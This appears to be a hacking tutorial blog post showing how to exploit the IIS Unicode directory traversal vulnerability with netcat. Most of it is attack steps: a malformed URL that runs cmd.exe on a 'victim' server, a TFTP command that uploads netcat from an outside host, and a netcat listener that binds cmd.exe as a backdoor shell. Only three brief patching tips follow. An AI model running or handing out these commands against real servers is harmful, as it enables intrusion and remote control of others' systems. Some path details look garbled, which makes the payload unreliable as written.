In last post we had our look on directory transversal Unicode vulnerability and what is it, in this tutorial to netcat we will see how you can use netcat to exploit it. Before we proceed I want to make clear this is one the most known attack style on IIS server using netcat and no doubt you may find this tutorial as it is in many books related to hacking web servers so if you have already read that then this will surely be nothing new for you. Ok lets proceed to tutorial.
First of all you must be clear that the server is running vulnerable IIS server so you’ll have to perform some banner grabbing after scanning ports of victim. Or you can grab banner using netcat by using following command,
C:\>nc –v –n IP_address port_number
Once you are confirmed that victim is running vulnerable IIS server. Now its time to check whether the victim supports malformed URL, to do so we will send malformed URL to victim by using following command,
GET http://IP_address/scripts/..%255c ../wininit/system32/cmd.exe?/c+dir+c:
If it gives output as above then the victim is vulnerable. Now its time to backdoor netcat by uploading it to vulnerable server. Netcat can be uploaded using TFTP, integrate TFTP with exploit URL,
GET http://IP_address/scripts/..%255c ../wininit/system32/cmd.exe?/c+TFTP+-i+IP_address+GET+nc
Once netcat is uploaded we can use it as backdoor. Read netcat tutorial on backdoor. Now run following command on victim using same exploit URL,
nc –L –p port –d –e cmd.exe
Once done its your time to play inside.
-Update to Windows 2000 SP3 if you are using still using Windows 2000 server.
-Apply patches in Windows 2003
-Better update IIS server to IIS 7